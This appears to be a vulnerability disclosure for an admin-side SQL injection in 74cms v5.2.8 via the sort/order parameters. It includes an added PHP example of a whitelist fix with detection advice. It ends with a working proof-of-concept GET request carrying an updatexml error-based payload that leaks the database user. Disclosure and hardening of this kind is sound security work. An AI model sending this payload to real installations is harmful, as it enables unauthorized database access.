
74cms v5.2.8 SQLI


The vulnerability lies in the _list method of Common/Controller/BackendController.class.php: _list uses I() to read the sort and order request parameters and concatenates them into $order_by.

$order_by is then concatenated directly into the SQL query, which results in SQL injection.

The _list method is called from the index method.

Taking Admin/Controller/AdController.class.php as an example: the AdController class extends BackendController, and its category method calls index().
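The following PHP is an added illustration, not code from 74cms or ThinkPHP, of the pattern described above: an ORDER BY clause built by splicing the sort and order parameters into a string, placed beside a whitelist-validated version of the same helper. The function names, the $allowedColumns list and the sample inputs are assumptions made for the example; the request array stands in for what ThinkPHP's I() would return.

```php
<?php
// Added example (not 74cms code). Contrasts a string-spliced ORDER BY with a
// whitelist-validated one. Function names and column names are assumptions.

// Vulnerable pattern, as the advisory describes: sort and order are spliced
// into the clause unchanged, so whatever the client sends reaches the SQL engine.
function buildOrderByUnsafe(array $params): string
{
    $sort  = $params['sort']  ?? 'id';
    $order = $params['order'] ?? 'desc';
    return "ORDER BY {$sort} {$order}";
}

// Hardened pattern: both values are checked against closed lists before they
// touch the query text; anything unexpected falls back to a fixed default.
// ORDER BY identifiers cannot be bound as prepared-statement parameters,
// which is why a whitelist (not escaping) is the right control here.
function buildOrderBySafe(array $params, array $allowedColumns): string
{
    $sort  = $params['sort']  ?? 'id';
    $order = strtolower($params['order'] ?? 'desc');

    if (!in_array($sort, $allowedColumns, true)) {
        $sort = 'id';                 // unknown column name: use the default
    }
    if (!in_array($order, ['asc', 'desc'], true)) {
        $order = 'desc';              // direction must be one of two literals
    }
    // The identifier is backtick-quoted; the direction is a fixed keyword.
    return "ORDER BY `{$sort}` {$order}";
}

// Constructed inputs (illustrative, not the request from the advisory):
// one benign pair and one pair carrying values that are not plain identifiers.
$benign  = ['sort' => 'add_time', 'order' => 'asc'];
$tainted = ['sort' => 'name; junk', 'order' => 'DESC junk'];

// Assumed set of columns the listing is allowed to sort on.
$allowedColumns = ['id', 'add_time', 'click'];

foreach (['benign' => $benign, 'tainted' => $tainted] as $label => $p) {
    echo $label . PHP_EOL;
    echo "  unsafe: " . buildOrderByUnsafe($p) . PHP_EOL;
    echo "  safe:   " . buildOrderBySafe($p, $allowedColumns) . PHP_EOL;
}
```

Run with `php example.php`: the unsafe builder echoes the tainted strings straight into the clause, while the safe builder reduces them to `ORDER BY `id` desc`. For detection, the same property helps: a sort or order value in the access log that is not a bare column name or asc/desc is a reliable signal to alert on.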


Log in with an administrator account and send the following request.

GET /74cms/upload/index.php?m=Admin&c=Ad&a=category&sort=1&order=and+updatexml(0,concat(0x7e,user()),0) HTTP/1.1
Host: [::]
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://[::]/74cms/upload/index.php?m=Admin&c=index&a=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: XDEBUG_SESSION=PHPSTORM; think_template=default; PHPSESSID=4gibptgp8kflrc0f9sd2t8pfm0; think_language=zh-CN
Connection: close